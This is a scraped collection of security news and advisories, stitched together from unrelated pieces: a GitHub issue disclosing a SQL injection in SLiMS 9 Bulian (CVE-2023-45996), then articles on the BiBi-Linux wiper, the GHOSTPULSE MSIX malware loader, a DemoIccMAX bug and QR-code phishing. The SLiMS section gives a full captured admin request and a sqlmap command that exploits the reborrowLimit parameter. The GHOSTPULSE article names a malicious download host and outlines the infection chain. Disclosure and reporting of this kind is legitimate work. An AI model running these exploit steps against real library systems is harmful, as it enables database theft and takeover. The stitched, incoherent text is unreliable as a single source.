While SAP’s October flaw count was much smaller than its peers’, attackers are still out there, so you should still keep up to date and get patching as soon as you can.

Apple, Google, and Microsoft Just Patched Some Spooky Security Flaws

SQL injection vulnerability in Senayan Library Management Systems Slims v.9 and Bulian v.9.6.1 allows a remote attacker to obtain sensitive information and execute arbitrary code via a crafted script to the reborrowLimit parameter in the member_type.php.

**The Bug**

A SQL Injection has found in admin/modules/membership/member_type.php at the code below

    $data['member_type_name'] = $dbs->escape_string($memberTypeName);
    $data['loan_limit'] = trim($_POST['loanLimit']);
    $data['loan_periode'] = trim($_POST['loanPeriode']);
    $data['enable_reserve'] = $_POST['enableReserve'];
    $data['reserve_limit'] = $_POST['reserveLimit'];
    $data['member_periode'] = $_POST['memberPeriode'];
    $data['reborrow_limit'] = $_POST['reborrowLimit'];
    $data['fine_each_day'] = $_POST['fineEachDay'];
    $data['grace_periode'] = $_POST['gracePeriode'];
    $data['input_date'] = date('Y-m-d');
    $data['last_update'] = date('Y-m-d');
    

**To Reproduce**

Steps to reproduce the behavior:

1.  Login as admin or user that has access membership type
    
2.  Make sure the burp application is turned on to capture the request as screenshot below  
    
3.  Save the request in a separate file (sample.reg)  
    sample.reg example
    

    POST /slims9_bulian-9.6.1/admin/modules/membership/member_type.php?itemID=2&detail=true&ajaxload=1& HTTP/1.1
    Host: localhost
    Content-Length: 1420
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    Origin: http://localhost
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryQUBKpazqdLdsHspa
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.97 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Referer: http://localhost/slims9_bulian-9.6.1/admin/index.php?mod=membership
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Cookie: SenayanAdmin=f5581i7ero1b1mitlh328upvmt; admin_logged_in=1; SenayanMember=37qocaml59lu0snk1tt3n74qgn
    Connection: close
    
    ------WebKitFormBoundaryQUBKpazqdLdsHspa
    Content-Disposition: form-data; name="csrf_token"
    
    29ad9eb49edd5718652dff82f33e7ecb4000e5f376eac9d52346c6843c5b9d16
    ------WebKitFormBoundaryQUBKpazqdLdsHspa
    Content-Disposition: form-data; name="form_name"
    
    mainForm
    ------WebKitFormBoundaryQUBKpazqdLdsHspa
    Content-Disposition: form-data; name="memberTypeName"
    
    abcdef
    ------WebKitFormBoundaryQUBKpazqdLdsHspa
    Content-Disposition: form-data; name="loanLimit"
    
    0
    ------WebKitFormBoundaryQUBKpazqdLdsHspa
    Content-Disposition: form-data; name="loanPeriode"
    
    0
    ------WebKitFormBoundaryQUBKpazqdLdsHspa
    Content-Disposition: form-data; name="enableReserve"
    
    1
    ------WebKitFormBoundaryQUBKpazqdLdsHspa
    Content-Disposition: form-data; name="reserveLimit"
    
    0
    ------WebKitFormBoundaryQUBKpazqdLdsHspa
    Content-Disposition: form-data; name="memberPeriode"
    
    1
    ------WebKitFormBoundaryQUBKpazqdLdsHspa
    Content-Disposition: form-data; name="reborrowLimit"
    
    4423
    ------WebKitFormBoundaryQUBKpazqdLdsHspa
    Content-Disposition: form-data; name="fineEachDay"
    
    1
    ------WebKitFormBoundaryQUBKpazqdLdsHspa
    Content-Disposition: form-data; name="gracePeriode"
    
    0
    ------WebKitFormBoundaryQUBKpazqdLdsHspa
    Content-Disposition: form-data; name="saveData"
    
    Update
    ------WebKitFormBoundaryQUBKpazqdLdsHspa
    Content-Disposition: form-data; name="updateRecordID"
    
    2
    ------WebKitFormBoundaryQUBKpazqdLdsHspa--
    
    
    

run the test with the following command:

    sqlmap -r example.req --level 5 --risk 3 -p reborrowLimit --random-agent --dbms=mysql --current-user
    

5.  You've entered into the system  
    

**Screenshots**

**Versions**

*   OS: Windows
*   Browser: Brave Browser | Version 1.57.57 Chromium: 116.0.5845.163 (Official Build) (64-bit)
*   Slims Version: slims9\_bulian-9.6.1

CVE-2023-45996: Vuln0wned Report: SQL Injection in member_type.php · Issue #216 · slims/slims9_bulian

By Waqas
The Security Joes Incident Response team of cybersecurity researchers recently discovered the new BiBi-Linux Wiper malware.
This is a post from HackRead.com Read the original post: Hamas Hackers Targeting Israelis with New BiBi-Linux Wiper Malware

The BiBi-Linux Wiper malware damages files and operating systems by overwriting data with useless information, rendering the affected files unusable.

Cybersecurity experts from Security Joes’ Incident Response team recently stepped forward to aid Israeli companies amid the **conflict between Israel and Hamas**. During their investigations, they uncovered a concerning discovery: a new type of malware known as the BiBi-Linux Wiper.

This malicious software, designed for Linux systems, poses a significant threat. It is a powerful executable file that, if granted root access, can potentially wipe out an entire operating system. What sets it apart is its ability to target specific folders, overwrite files, and concurrently corrupt data using multiple threads, significantly amplifying its impact and speed.

Unlike other malware types that aim to steal data or demand ransom payments, the BiBi-Linux Wiper takes a different approach. It damages files and operating systems by overwriting data with useless information, rendering the affected files unusable. This kind of destructive software, often termed a “**Wiper**,” is not entirely new but remains a menacing cybersecurity threat against companies, businesses and unsuspecting users.

According to the company’s **blog post**, one noteworthy detail is the naming convention used in the malware—each infected file is titled bibi-linux.out. This name, seemingly random, actually holds a political undertone, as “bibi” is a common nickname for the current Israeli Prime Minister, Benjamin Netanyahu. Further exploration into the malware’s inner workings revealed this string hardcoded within its structure, used to generate identifiers for corrupted files.

The researchers noted the rarity of this malware; at the time of their investigation, it had only received two detections on VirusTotal, suggesting its newness and limited distribution.

The malware, upon execution, produces an excessive amount of output, revealing details about its progress and actions. To address this, threat actors use the “nohup” command, redirecting output to a file and preventing the wiping process from halting even if the console is closed.

Its use of multiple threads and system calls enables it to corrupt files rapidly and efficiently. The malware follows a pattern, overwriting files with random data, renaming them with a ‘BiBi’ extension, and excluding certain file types crucial for the operating system’s function.

****Sophisticated Cyber Attacks Linked to Hamas and Pro-Palestinian Groups Target Israel****

Hamas has displayed a surprising level of sophistication in its cyber warfare tactics, as demonstrated by several incidents in recent years. **In 2014**, Hamas not only breached the live transmission of Israel’s Channel 10 TV station but also defaced the broadcast by displaying distressing images of Palestinian civilians affected by Israeli airstrikes in Gaza.

**In July 2018**, Israel accused Hamas of spying on IDF soldiers using malicious World Cup and dating apps. The group reportedly exploited hundreds of IDF Android devices by luring users with images of attractive women.

**By February 2020**, reports surfaced that Hamas hackers masqueraded as women to deceive IDF personnel into downloading malware. These hackers, posing as women, sent out malware to gather critical information and gain control over the soldiers’ phone functions.

Despite these cyberattacks attributed to Hamas, other groups have also targeted **Israel’s critical infrastructure**. AnonGhost, a pro-Palestinian group, not only **hacked the Red Alert App**, an Israeli rocket alert app but also sent fabricated missile, rocket, and nuclear bomb alerts to Israeli citizens.

**On October 16th, 2023**, researchers identified a fraudulent rocket alert app hosted on a malicious website, distributing malware onto the smartphones of unsuspecting Israeli citizens.

Nonetheless, cybersecurity experts persist in monitoring and analyzing these threats. The readiness of companies to defend against evolving cyber risks remains of utmost importance.

1.  Gaza Cybergang targeting Palestinian authority figures
2.  US seizes official website of Iranian state-owned Press TV
3.  Israeli Spyware Vendor Uses Chrome 0day to Target Journalists
4.  Israel claims to bomb Hamas’s cyber Ops HQ amidst uncertainties
5.  Android malware on Play Store targeting Palestinians on Facebook

Hamas Hackers Targeting Israelis with New BiBi-Linux Wiper Malware

A new cyber attack campaign has been observed using spurious MSIX Windows app package files for popular software such as Google Chrome, Microsoft Edge, Brave, Grammarly, and Cisco Webex to distribute a novel malware loader dubbed GHOSTPULSE.
"MSIX is a Windows app package format that developers can leverage to package, distribute, and install their applications to Windows users," Elastic

Malware / Endpoint Security

A new cyber attack campaign has been observed using spurious MSIX Windows app package files for popular software such as Google Chrome, Microsoft Edge, Brave, Grammarly, and Cisco Webex to distribute a novel malware loader dubbed **GHOSTPULSE**.

"MSIX is a Windows app package format that developers can leverage to package, distribute, and install their applications to Windows users," Elastic Security Labs researcher Joe Desimone said in a technical report published last week.

"However, MSIX requires access to purchased or stolen code signing certificates making them viable to groups of above-average resources."

Based on the installers used as lures, it's suspected that potential targets are enticed into downloading the MSIX packages through known techniques such as compromised websites, search engine optimization (SEO) poisoning, or malvertising.

Launching the MSIX file opens a Windows prompting the users to click the Install button, doing so which results in the stealthy download of GHOSTPULSE on the compromised host from a remote server ("manojsinghnegi\[.\]com") via a PowerShell script.

This process take place over multiple stages, with the first payload being a TAR archive file containing an executable that masquerades as the Oracle VM VirtualBox service (VBoxSVC.exe) but in reality is a legitimate binary that's bundled with Notepad++ (gup.exe).

Also present within the TAR archive is handoff.wav and a trojanized version of libcurl.dll that's loaded to take the infection process to the next stage by exploiting the fact that gup.exe is vulnerable to DLL side-loading.

"The PowerShell executes the binary VBoxSVC.exe that will side load from the current directory the malicious DLL libcurl.dll," Desimone said. "By minimizing the on-disk footprint of encrypted malicious code, the threat actor is able to evade file-based AV and ML scanning."

The tampered DLL file subsequently proceeds by parsing handoff.wav, which, in turn, packs an encrypted payload that's decoded and executed via mshtml.dll, a method known as module stomping, to ultimately load GHOSTPULSE.

GHOSTPULSE acts as a loader, employing another technique known as process doppelgänging to kick start the execution of the final malware, which includes SectopRAT, Rhadamanthys, Vidar, Lumma, and NetSupport RAT.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Hackers Using MSIX App Packages to Infect Windows PCs with GHOSTPULSE Maware

In International Color Consortium DemoIccMAX 79ecb74, CIccXformMatrixTRC::GetCurve in IccCmm.cpp in libSampleICC.a has a NULL pointer dereference.

CVE-2023-46867: Bugs from Fuzzing · Issue #54 · InternationalColorConsortium/DemoIccMAX

By Deeba Ahmed
Explore insights into the rise of Quishing attacks, the risks associated with QR code exploitation, and crucial preventive…
This is a post from HackRead.com Read the original post: Surge in QR Code Quishing: Check Point Records 587% Attack Spike

Explore insights into the rise of Quishing attacks, the risks associated with QR code exploitation, and crucial preventive measures to protect against this growing cybersecurity threat.

Check Point’s Harmony Email team has reported a startling increase of 587% in QR code phishing or Quishing attacks. This shocking rise was observed between August and September 2023. Researchers noted thousands of QR code-related attacks each month.

 In the company’s blog post, authored by Check Point’s cybersecurity researcher/analyst Jeremy Fuchs, explained that hackers lure users with QR codes, redirecting them to credential-harvesting websites. In the UK and Europe, around 86.66% of smartphone users have scanned one QR code at least in their lifetime, and 36.40% scanned a code at least once a week.

It isn’t surprising though because in October, Hackread.com reported the findings of SaaS-base cloud messaging security firm SlashNext, according to which a sudden spike was witnessed in QR code-based phishing attacks.

QR codes are easier to exploit because these encode complex data and a compromised code can quickly redirect users to malicious websites. SlashNext researchers noted that attackers prefer two prominent attack methods to exploit QR codes: Quishing and QRLJacking. Now, Check Point has reported that a massive rise in Quishign attacks has been noticed.

Quishing is a type of phishing attack. Unsuspecting users are tricked into accessing malicious websites or downloading malware after scanning a QR code. There are several reasons why Quishing attacks are on the rise, such as their widespread nature, as millions use them to make payments, scan menus, and access information, which makes them an attractive target for threat actors.

Moreover, QR codes can be exploited to hide malicious links, which can lead users to any website the attacker wants them to without alerting them about suspicious activity. 

Harmony Email’s team found that lately, attackers are redirecting users to credential-harvesting sites through QR code lures using social engineering to target end-users with emails that can look like this:

Image credit: Check Point

The lure used in the email is that Microsoft multi-factor authentication is expiring, and the users must re-authenticate. It is worth noting that the email’s body content claims to be sent by Microsoft, but the sender’s address is different.

To combat Quishing, you must add the OCR (Optical Character Recognition) feature in security solutions to detect malicious QR codes. OCR can help you translate the codes into the URL behind the code, and then you can run the URL through a URL analysis tool. However, suspicion should be raised right when you observe that a QR code is present in the email message body.

Since Quishing attacks are becoming a solid threat, it is essential to exercise caution. Never scan without checking the sender’s source, and avoid scanning codes provided with emails unless you have verified the sender. Security professionals must implement email security that leverages OCR for all attacks. They must implement AL, ML, and NLP-based security to understand the real intentions of a message.

****_RELATED ARTICLES_****

1.  Barcode Reader Apps on Play Store Infected with Adware
2.  Stream-Jacking: Malicious YouTube Livestreams Aid Malware
3.  How to make a QR code to accept Bitcoin while keeping it secure
4.  “Picture in Picture” Technique Exploited in Deceptive Phishing Attack
5.  Fake ROBLOX and Nintendo game cracks drop ChromeLoader malware

Tag

#chrome